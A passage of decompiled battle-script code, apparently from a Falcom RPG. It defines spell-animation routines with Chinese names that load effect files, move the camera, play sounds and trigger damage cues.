AS_8D(0x7, 0xFC, 0x3E8, 0x320, 0x3E8)
Sleep(300)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x384, 0x3E8)
Sleep(300)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x320, 0x3E8)
Sleep(300)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x2BC, 0x3E8)
Sleep(200)
Yield()
AS_52(0x5)
label("loc_31AC")
Jc(0x5, 0x3, 0x0, "loc_31E6")
AS_8D(0x7, 0xFC, 0x3E8, 0x258, 0x3E8)
Sleep(100)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x1F4, 0x3E8)
Sleep(100)
Yield()
AS_53(0x1)
Jump("loc_31AC")
label("loc_31E6")
CancelEffect(0xFF, 0x2)
AS_8D(0xA, 0x0, 0x0, 0x0, 0x0)
Call("loc_2")
AS_8D(0x7, 0xFC, 0x3E8, 0x2BC, 0x3E8)
Sleep(100)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x384, 0x3E8)
Sleep(100)
Yield()
AS_8D(0x7, 0xFC, 0x3E8, 0x3E8, 0x3E8)
AS_3D(200, 200, 200, 500)
WaitEffect(0xFF, 0x2)
FreeEffect(0x0)
Return()
# 暗物质 end
def Craft_光子飞射(): pass
label("光子飞射")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg061_00.eff")
AS_78(0)
SoundEx(199, 0x0)
Sleep(250)
Yield()
PlayEffect(0xFF, 0xF9, 0x0, 0x4, 0, 0, 500, 0, 0, 0, 800, 800, 800, -1)
Sleep(1000)
Yield()
LockCamera(0xFE, 0, 0, 0, 300)
Sleep(200)
Yield()
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 光子飞射 end
def Craft_大灾变(): pass
label("大灾变")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg062_00.eff")
LoadEffect(0x1, "battle\\mg062_01.eff")
AS_78(0)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 28, 20)
Sleep(600)
Yield()
AS_3D(500, 500, 500, 1800)
SoundEx(247, 0x0)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFF, 0x0, 0x4, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x1)
Sleep(500)
Yield()
Jc(0x16, 0x1, 0x0, "loc_3347")
LockCamera(0xFF, 0, -3500, 0, 500)
Jump("loc_335A")
label("loc_3347")
ForeachTarget("loc_335A")
LockCamera(0xFC, 0, -3500, 0, 500)
label("loc_335A")
Sleep(400)
Yield()
SetBrightness(0x0, 0x0, 300)
Fade(0x1, 300, 0x0)
CancelBlur(200)
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x1)
FreeEffect(0x0)
CancelEffect(0xFF, 0x4)
AS_60(0xF7)
AS_5F(0xFC, 0x0)
AS_8D(0xF, 0x0, 0x0, 0x0, 0x0)
AS_03(0xFC, 0xB4)
LockCamera(0xFD, 0, 0, 0, 0)
SetCameraDegree(25, 35, 0, 0)
Sleep(100)
Yield()
SetCameraDistance(26000, 300)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SetCameraDistance(30000, 1000)
Sleep(1000)
Yield()
Fade(0x1, 400, 0x0)
SetCameraDistance(18000, 200)
CancelBlur(200)
Sleep(200)
Yield()
BlurSwitch(0xC8, 0xBBFFFFFF, 0x0, 0x1, 0x5)
SetCameraDistance(25000, 3000)
Sleep(500)
Yield()
AS_3D(300, 300, 200, 5500)
Sleep(1500)
Yield()
AS_B0(0x8, 0x9C4)
Sleep(1200)
Yield()
SetCameraDegree(25, 35, -7, 0)
Sleep(800)
Yield()
AS_60(0xF7)
Sleep(2500)
Yield()
Fade(0x1, 500, 0x0)
CancelBlur(500)
ResetBrightness(0)
SetBrightness(0x0, 0x1, 0)
AS_31(0x17, 0x0)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(0, 22, 32)
AS_8D(0xA, 0x0, 0x0, 0x0, 0x0)
AS_0A(0xFC, 0x1, 0x0, 0x0)
AS_7A(0x1)
AS_5F(0xF7, 0x1)
Sleep(100)
Yield()
BeginChrThread(0xFF, 3, "loc_2", 0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 500, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFF, 0, 0, 0, 0)
Return()
# 大灾变 end
def Craft_金耀辉环(): pass
label("金耀辉环")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg063_00.eff")
LoadEffect(0x1, "battle\\mg063_01.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFB, 0, 0, 0, 600)
SetCameraDistance(18700, 1000)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 550, 550, 550, -1)
PlayEffect(0xFF, 0xFB, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 550, 550, 550, -1)
Sleep(800)
Yield()
Sleep(700)
Yield()
AS_B0(0x15, 0x7D0)
LockCamera(0xFB, 0, 1200, 0, 2400)
SetCameraDistance(21000, 2400)
Sleep(3000)
Yield()
Fade(0x1, 500, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Sleep(800)
Yield()
CancelBlur(500)
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Return()
# 金耀辉环 end
def Craft_天劫轮回光(): pass
label("天劫轮回光")
AS_78(1)
LoadEffect(0x0, "battle\\mg064_00.eff")
LoadEffect(0x1, "battle\\mg064_01.eff")
LoadEffect(0x2, "battle\\mg064_02.eff")
LoadEffect(0x3, "battle\\mg064_03.eff")
LoadEffect(0x4, "battle\\mg064_04.eff")
LoadEffect(0x5, "battle/sc036000.eff")
LoadEffect(0x6, "battle/ms00001.eff")
LoadEffect(0x7, "battle\\mg064_05.eff")
AS_78(0)
ResetTarget()
Call("loc_17D")
ClearChipModeFlags(0x0, 0xFC, 0x1)
AS_3E(0x1F4, 0x0)
AS_5F(0xFC, 0x0)
AS_8D(0xB, 0x0, 0x0, 0x0, 0x0)
LockCamera(0xF3, 0, 0, 0, 0)
SetCameraDegree(138, 39, 0, 0)
SetCameraDistance(21000, 0)
AS_AC(0x3E8, 0xFFFFFFFF)
LockCamera(0xF3, 0, 1500, 0, 3500)
SetCameraDistance(17500, 3500)
SetCameraDegree(0, -5, 10, 3000)
PlayEffect(0xFF, 0xFF, 0x5, 0x1, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
SetEffectColor(0xFF, 129, 0xFFFCDE69)
Sleep(700)
Yield()
PlayEffect(0xFF, 0xF3, 0x4, 0x0, 0, 3000, 0, 0, 0, 0, 400, 400, 400, 3)
SoundEx(359, 0x1)
Sleep(800)
Yield()
PlayEffect(0xFF, 0xF3, 0x3, 0x0, 0, 4000, 10000, 0, 0, 0, 1100, 1100, 1100, -1)
Sleep(1500)
Yield()
CancelEffect(0xFF, 0x3)
StopSound(359)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xF3, 0x6, 0x0, 0, 4000, 10000, 0, 0, 0, 1800, 1800, 1800, -1)
SetEffectColor(0xFF, 129, 0xFFDD71F9)
CancelEffect(0xFF, 0x4)
Sleep(1500)
Yield()
SetBattleSpeed(850)
PlayEffect(0xFF, 0xF3, 0x0, 0x0, 0, 4000, 9500, 0, 0, 0, 500, 500, 500, 2)
SetCameraDistance(19000, 2200)
SetBattleSpeed(650)
Sleep(2600)
Yield()
PlayEffect(0xFF, 0xF3, 0x1, 0x0, 0, 4000, 10000, 0, 0, 0, 400, 400, 400, -1)
Sleep(200)
Yield()
BlurSwitch(0x0, 0xBBFFFFFF, 0x0, 0x1, 0x1)
ResetTarget()
label("loc_37D8")
ForeachTarget("loc_3802")
def lambda_37DF():
ChrMove(0xFF, 0xF3, 0, 3500, 10000, 3000, 0x0)
Return()
QueueWorkItem(0xFE, 1, lambda_37DF)
BeginChrThread(0xFE, 3, "loc_393C", 0x0)
Sleep(30)
Yield()
NextTarget()
Jump("loc_37D8")
label("loc_3802")
Sleep(2300)
Yield()
PlayEffect(0xFF, 0xF3, 0x7, 0x0, 0, 3500, 9500, 0, 0, 0, 500, 500, 500, 2)
Sleep(2000)
Yield()
AS_A8(0x0, 0x3)
Sleep(400)
Yield()
AS_A8(0x0, 0x1)
PlayEffect(0xFF, 0xF3, 0x5, 0x1, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SetEffectColor(0xFF, 129, 0xFFFCDE69)
SoundEx(359, 0x1)
AS_A6(0xFF, 0x2, 0x2EE, 0x640, 0x0)
SoundEx(269, 0x0)
CancelBlur(1000)
Sleep(500)
Yield()
StopSound(359)
SetBattleSpeed(1000)
PlayEffect(0xFF, 0xF3, 0x6, 0x0, 0, 4000, 10000, 0, 0, 0, 3000, 3000, 3000, -1)
SoundEx(566, 0x0)
Sleep(100)
Yield()
PlayEffect(0xFF, 0xF3, 0x2, 0x0, 0, 3500, 9500, -20, 0, 0, 750, 750, 750, 3)
BlurSwitch(0x190, 0xBBFFFFFF, 0x0, 0x1, 0x1)
SetCameraDistance(4000, 2000)
AS_3E(0x3E8, 0x7D0)
SetBattleSpeed(800)
SoundEx(220, 0x0)
Sleep(1000)
Yield()
CancelEffect(0xFF, 0x2)
Sleep(1000)
Yield()
CancelBlur(1000)
AS_43(0x0, 0x1F4, 0xFFFFFFFF)
Sleep(1000)
Yield()
SetBattleSpeed(1000)
AS_8D(0xA, 0x0, 0x0, 0x0, 0x0)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
AS_A8(0x0, 0x4)
AS_A8(0x0, 0x5)
AS_A8(0x0, 0x6)
AS_A8(0x0, 0x7)
Call("loc_1D5")
AS_6E(0x40000)
Call("loc_1A3")
EndChrThread(0xFC, 1)
Call("loc_1CA")
Return()
label("loc_393C")
AS_8D(0x7, 0xFF, 0x3B6, 0x3B6, 0x3B6)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x384, 0x384, 0x384)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x352, 0x352, 0x352)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x320, 0x320, 0x320)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x2EE, 0x2EE, 0x2EE)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x2BC, 0x2BC, 0x2BC)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x28A, 0x28A, 0x28A)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x258, 0x258, 0x258)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x226, 0x226, 0x226)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x1F4, 0x1F4, 0x1F4)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x1C2, 0x1C2, 0x1C2)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x190, 0x190, 0x190)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x15E, 0x15E, 0x15E)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x12C, 0x12C, 0x12C)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0xFA, 0xFA, 0xFA)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0xC8, 0xC8, 0xC8)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x96, 0x96, 0x96)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x64, 0x64, 0x64)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x32, 0x32, 0x32)
Sleep(150)
Yield()
AS_8D(0x7, 0xFF, 0x0, 0x0, 0x0)
Sleep(150)
Yield()
Return()
# 天劫轮回光 end
def Craft_41_65_3AF5(): pass
label("Craft_41_65_3AF5")
Return()
# Craft_41_65_3AF5 end
def Craft_42_66_3AF6(): pass
label("Craft_42_66_3AF6")
Return()
# Craft_42_66_3AF6 end
def Craft_43_67_3AF7(): pass
label("Craft_43_67_3AF7")
Jump("Craft_11_17_D69")
# Craft_43_67_3AF7 end
def Craft_震天之符文(): pass
label("震天之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg068_00.eff")
LoadEffect(0x3B, "battle\\mg068_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg068_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 震天之符文 end
def Craft_混沌烙印(): pass
label("混沌烙印")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg070_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 750, 750, 750, -1)
Sleep(600)
Yield()
LockCamera(0xFE, 0, 1000, 0, 600)
Sleep(3000)
Yield()
LockCamera(0xFE, 0, 0, 0, 300)
AS_3D(300, 300, 300, 200)
Sleep(200)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 混沌烙印 end
def Craft_幻影之塔(): pass
label("幻影之塔")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg071_00.eff")
LoadEffect(0x1, "battle\\mg071_01.eff")
LoadEffect(0x2, "battle\\mg071_02.eff")
AS_78(0)
AS_43(0x0, 0x258, 0xFF000000)
LockCamera(0xFB, 0, 3000, 0, 600)
Sleep(600)
Yield()
SetBrightness(0x0, 0x0, 0)
Fade(0x0, 500, 0xFF000000)
AS_60(0xF7)
LockCamera(0xFB, 0, 3000, 0, 0)
SetCameraDegree(0, 10, 3, 0)
SetCameraDistance(25000, 0)
Sleep(300)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 2)
LockCamera(0xFB, 0, 2000, 0, 0)
Sleep(1000)
Yield()
SetCameraDistance(18000, 2400)
AS_3D(100, 100, 100, 3000)
Sleep(400)
Yield()
LockCamera(0xFB, 0, 14000, -4000, 2800)
SetCameraDegree(15, -15, 5, 1800)
SetCameraDistance(30000, 1500)
Sleep(900)
Yield()
AS_43(0x0, 0x320, 0xFFFFFFFF)
Sleep(800)
Yield()
Fade(0x1, 500, 0xFFFFFFFF)
Sleep(150)
Yield()
PlayEffect(0xFF, 0xFB, 0x2, 0x0, 0, 18000, 0, 0, 0, 0, 1000, 1000, 1000, 3)
Sleep(1250)
Yield()
LockCamera(0xFB, 0, 18000, -2000, 2000)
Sleep(1000)
Yield()
AS_43(0x0, 0x1F4, 0x0)
Sleep(500)
Yield()
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
FreeEffect(0x0)
FreeEffect(0x2)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
AS_B0(0xA, 0x0)
LockCamera(0xFB, 0, 4000, 0, 0)
LockCamera(0xFB, 0, 0, 0, 4000)
SetCameraDistance(30000, 0)
SetCameraDistance(25000, 3000)
AS_5F(0xFC, 0x0)
PlayEffect(0xFF, 0xFB, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(100)
Yield()
AS_3D(100, 100, 100, 2000)
Sleep(500)
Yield()
AS_B0(0x14, 0xBB8)
Sleep(1500)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x1)
Sleep(1000)
Yield()
SetBattleSpeed(700)
Sleep(200)
Yield()
SetBattleSpeed(500)
AS_43(0x0, 0x12C, 0xFFFFFFFF)
Sleep(400)
Yield()
SetBattleSpeed(1000)
CancelBlur(200)
Fade(0x1, 300, 0xFFFFFFFF)
ResetBrightness(0)
AS_31(0x17, 0x0)
CancelBlur(0)
SetBrightness(0x0, 0x1, 0)
AS_5F(0xF7, 0x1)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(0, 22, 32)
BeginChrThread(0xFF, 3, "loc_2", 0x0)
Sleep(500)
Yield()
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
LockCamera(0xF2, 0, 0, 0, 0)
Return()
# 幻影之塔 end
def Craft_天国之门(): pass
label("天国之门")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg072_00.eff")
LoadEffect(0x1, "battle\\mg072_01.eff")
LoadEffect(0x2, "battle\\mg072_02.eff")
AS_78(0)
Sleep(300)
Yield()
LockCamera(0xFF, 0, 1500, 0, 600)
SetBrightness(0x0, 0x0, 500)
Sleep(500)
Yield()
Fade(0x1, 300, 0x0)
AS_60(0xF7)
SetCameraDegree(-45, 17, 0, 0)
LockCamera(0xF3, 0, 40000, 0, 0)
SetCameraDistance(27500, 0)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xF3, 0x0, 0x0, 0, 40000, 0, 180, 0, 0, 1000, 1000, 1000, 4)
LockCamera(0xF3, 0, 41000, 0, 1000)
PlayEffect(0xFF, 0xF3, 0x2, 0x0, 0, 38000, 0, 0, 0, 0, 1000, 1000, 1000, 3)
Sleep(2500)
Yield()
Fade(0x1, 300, 0x0)
SetCameraDegree(0, 8, 0, 0)
SetCameraDistance(24000, 0)
Sleep(1200)
Yield()
SetCameraDistance(35000, 1000)
AS_B0(0xFFFD, 0x5DC)
Sleep(1200)
Yield()
AS_43(0x0, 0x258, 0x0)
ResetBrightness(500)
Fade(0x1, 600, 0x0)
CancelEffect(0xFF, 0x4)
CancelEffect(0xFF, 0x3)
FreeEffect(0x0)
FreeEffect(0x2)
LockCamera(0xF3, 0, 3000, 0, 0)
AS_31(0x17, 0x0)
AS_3A(0x23, 0x0)
AS_B0(0x23, 0x0)
SetCameraDistance(28000, 0)
AS_5F(0xF7, 0x0)
AS_3A(0xFFDD, 0x1194)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xF3, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(200)
Yield()
AS_B0(0x14, 0xDAC)
LockCamera(0xF3, 0, 0, 0, 3300)
Sleep(3300)
Yield()
SetCameraDistance(32000, 300)
AS_B0(0x20, 0x12C)
BeginChrThread(0xFF, 3, "loc_2", 0x0)
SetBrightness(0x0, 0x1, 0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xF4, 0, 0, 0, 0)
AS_5F(0xF7, 0x1)
Return()
# 天国之门 end
def Craft_银色荆刺(): pass
label("银色荆刺")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg073_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 900, 900, 900, -1)
Sleep(600)
Yield()
LockCamera(0xFE, 0, 1000, 0, 600)
Sleep(3000)
Yield()
LockCamera(0xFE, 0, 0, 0, 300)
Sleep(200)
Yield()
label("loc_40A7")
ForeachTarget("loc_40B8")
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(100)
Yield()
NextTarget()
Jump("loc_40A7")
label("loc_40B8")
AS_14(0x0)
FreeEffect(0x0)
Return()
# 银色荆刺 end
def Craft_幻银方舟炮(): pass
label("幻银方舟炮")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg074_00.eff")
LoadEffect(0x1, "battle\\mg074_01.eff")
LoadEffect(0x2, "battle\\mg074_02.eff")
LoadEffect(0x3, "battle\\mg074_03.eff")
LoadEffect(0x4, "battle\\com000.eff")
LoadEffect(0x5, "battle\\mg074_04.eff")
LoadEffect(0x6, "battle\\mg074_05.eff")
LoadEffect(0x7, "battle\\mg074_06.eff")
AS_8E(0x1, 0x0, "ef_ship")
AS_8E(0x7, 0x0, 0xFFFFFF, 0x0, 0x0, 0x0)
AS_78(0)
Call("loc_17D")
AS_3E(0xFA, 0x0)
AS_AC(0x7D0, 0xFFFFFFFF)
Fade(0x1, 500, 0x0)
SetBattleSpeed(700)
AS_34()
LockCamera(0xFD, 0, 2000, 10000, 0)
SetCameraDegree(35, 0, 0, 0)
SetCameraDistance(12000, 0)
SetCameraDistance(20000, 3500)
SetCameraDegree(45, -15, 0, 4500)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 3)
Sleep(300)
Yield()
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 2000, 10000, -20, 0, 0, 1000, 1000, 1000, 2)
SoundEx(359, 0x1)
Sleep(500)
Yield()
SetBattleSpeed(850)
Sleep(4500)
Yield()
SoundEx(239, 0x0)
AS_34()
LockCamera(0xFD, 700, 700, 4200, 1200)
SetCameraDegree(7, -23, -10, 1500)
SetCameraDistance(28500, 1500)
StopSound(359)
Sleep(2000)
Yield()
SetBattleSpeed(1000)
Fade(0x1, 500, 0x0)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
AS_34()
LockCamera(0xFD, -300, 700, 200, 0)
SetCameraDegree(227, -4, 0, 0)
SetCameraDistance(6000, 0)
AS_3E(0x258, 0x0)
LockCamera(0xFD, -300, 0, 200, 3000)
SetCameraDegree(233, -23, 0, 3000)
SetCameraDistance(7500, 3000)
PlayEffect(0xFF, 0xFD, 0x5, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 2)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 3)
AS_1A(0xFF, 0x3, 0x1A2C)
SoundEx(239, 0x0)
Sleep(4500)
Yield()
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
Fade(0x1, 500, 0x0)
AS_3E(0x1F4, 0x0)
AS_5F(0xFC, 0x0)
AS_34()
LockCamera(0xF2, 0, 500, 0, 0)
SetCameraDegree(45, 20, 0, 0)
SetCameraDistance(26000, 0)
AS_3E(0x1F4, 0x0)
SetCameraDegree(90, 20, 0, 4000)
SetCameraDistance(29000, 4000)
AS_3E(0x320, 0xFA0)
AS_8E(0x7, 0x0, 0xFFFFFF, 0x0, 0x0, 0x0)
StopEffect(0xFF, 0x3)
StopEffect(0xFF, 0x6)
AS_A8(0x0, 0x2)
PlayEffect(0xFF, 0xF2, 0x3, 0x0, 0, 0, 0, 0, 0, 0, 900, 900, 900, -1)
Sleep(650)
Yield()
BeginChrThread(0xFF, 3, "loc_475F", 0x0)
Sleep(2500)
Yield()
EndChrThread(0xFF, 3)
AS_A8(0x0, 0x3)
Fade(0x1, 800, 0x0)
AS_8E(0x7, 0x0, 0xFFFFFFFF, 0x0, 0x0, 0x0)
AS_8E(0x6, 0x0, 0xC8, 0x0, 0x0, 0x0)
AS_8E(0x2, 0x0, 0x15E, 0x0, 0x0, 0x0)
AS_8E(0xB, 0x0, 0x4B0, 0x3E8, 0x3E8, 0x0)
AS_60(0xFC)
SoundEx(239, 0x0)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 3)
AS_1A(0xFF, 0x3, 0x2EE0)
AS_34()
LockCamera(0xFD, 0, 800, 20900, 0)
SetCameraDegree(185, -4, -1, 0)
SetCameraDistance(3700, 0)
AS_3E(0x3E8, 0x0)
AS_AC(0x3E8, 0xFFFFFFFF)
LockCamera(0xFD, -600, 1100, 20200, 3300)
SetCameraDegree(252, -8, -11, 3300)
SetCameraDistance(3200, 3300)
Sleep(2500)
Yield()
SetBattleSpeed(850)
Play3DEffect(0xFF, 0xEF, "Null_right01", 0x2, 0x1, 0, -50, -70, 0, 80, 0, 250, 250, 250, -1)
Play3DEffect(0xFF, 0xEF, "Null_left01", 0x2, 0x1, 0, -50, -70, 0, 280, 0, 250, 250, 250, -1)
SoundEx(258, 0x0)
Sleep(100)
Yield()
Play3DEffect(0xFF, 0xEF, "Null_right02", 0x2, 0x1, 0, -50, 0, 0, 90, 0, 250, 250, 250, -1)
Play3DEffect(0xFF, 0xEF, "Null_left02", 0x2, 0x1, 0, -50, 0, 0, 270, 0, 250, 250, 250, -1)
Sleep(100)
Yield()
Play3DEffect(0xFF, 0xEF, "Null_right03", 0x2, 0x1, 0, -50, 0, 0, 95, 0, 250, 250, 250, -1)
Play3DEffect(0xFF, 0xEF, "Null_left03", 0x2, 0x1, 0, -50, 0, 0, 265, 0, 250, 250, 250, -1)
Sleep(1000)
Yield()
SetBattleSpeed(1200)
LockCamera(0xFD, -1000, 600, 19900, 1200)
SetCameraDistance(6500, 1200)
SetCameraDegree(258, -16, -17, 1200)
SoundEx(321, 0x0)
BlurSwitch(0x0, 0xBBFFFFFF, 0x0, 0x1, 0xF)
Sleep(1500)
Yield()
CancelBlur(500)
StopEffect(0xFF, 0x3)
StopEffect(0xFF, 0x6)
AS_A8(0x0, 0x2)
Fade(0x1, 500, 0x0)
SetBattleSpeed(1000)
AS_3E(0x1F4, 0x0)
AS_8E(0x7, 0x0, 0xFFFFFF, 0x0, 0x0, 0x0)
AS_34()
LockCamera(0xFD, -13500, 42000, -9900, 0)
SetCameraDegree(50, -3, 0, 0)
SetCameraDistance(14000, 0)
AS_3E(0x1F4, 0x0)
SetCameraDegree(50, 20, 0, 1000)
LockCamera(0xFD, -13500, 45000, -9900, 1000)
Sleep(200)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x1)
PlayEffect(0xFF, 0xF2, 0x7, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 2)
Sleep(350)
Yield()
CancelEffect(0xFF, 0x2)
SetBattleSpeed(700)
Sleep(700)
Yield()
AS_A8(0x0, 0x7)
Fade(0x1, 500, 0x0)
AS_3E(0x1F4, 0x0)
AS_5F(0xFC, 0x0)
AS_34()
LockCamera(0xF2, 0, 8000, 0, 0)
SetCameraDegree(45, 3, 0, 0)
SetCameraDistance(22000, 0)
AS_3E(0x1F4, 0x0)
SetCameraDegree(90, 20, 0, 2500)
LockCamera(0xF2, 0, 1500, 0, 1500)
Sleep(500)
Yield()
AS_3E(0x320, 0x9C4)
StopEffect(0xFF, 0x3)
StopEffect(0xFF, 0x6)
AS_A8(0x0, 0x2)
Sleep(200)
Yield()
SetBattleSpeed(1000)
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x1, 0xA)
PlayEffect(0xFF, 0xF2, 0x6, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(500)
Yield()
SetCameraDistance(25000, 2000)
BeginChrThread(0xFF, 3, "loc_475F", 0x0)
Sleep(2500)
Yield()
AS_43(0x0, 0x1F4, 0xFFFFFFFF)
Sleep(1000)
Yield()
CancelBlur(500)
EndChrThread(0xFF, 2)
EndChrThread(0xFF, 3)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
AS_A8(0x0, 0x4)
AS_A8(0x0, 0x5)
AS_A8(0x0, 0x6)
AS_A8(0x0, 0x7)
Call("loc_1D5")
AS_8E(0x4, 0x0, 0x0, 0x0, 0x0, 0x0)
AS_6E(0x40000)
Call("loc_1A3")
Call("loc_1CA")
Return()
label("loc_475F")
AS_3D(200, 200, 200, 500)
BeginChrThread(0xFF, 2, "loc_37", 0x0)
WaitChrThread(0xFF, 2)
Yield()
Jump("loc_475F")
# 幻银方舟炮 end
def Craft_4B_75_4774(): pass
label("Craft_4B_75_4774")
Return()
# Craft_4B_75_4774 end
def Craft_4C_76_4775(): pass
label("Craft_4C_76_4775")
Return()
# Craft_4C_76_4775 end
def Craft_4D_77_4776(): pass
label("Craft_4D_77_4776")
Jump("Craft_11_17_D69")
# Craft_4D_77_4776 end
def Craft_幻影之符文(): pass
label("幻影之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg078_00.eff")
LoadEffect(0x3B, "battle\\mg078_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg078_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 幻影之符文 end
def Craft_大地治愈(): pass
label("大地治愈")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg080_00.eff")
AS_78(0)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(200, 20, 30)
Sleep(600)
Yield()
label("loc_4806")
ForeachTarget("loc_4831")
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageCue(0xFE)
Sleep(200)
Yield()
NextTarget()
Jump("loc_4806")
label("loc_4831")
Sleep(1450)
Yield()
AS_14(0x0)
FreeEffect(0x0)
Return()
# 大地治愈 end
def Craft_结晶防护(): pass
label("结晶防护")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg081_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 500, 0, 600)
Sleep(600)
Yield()
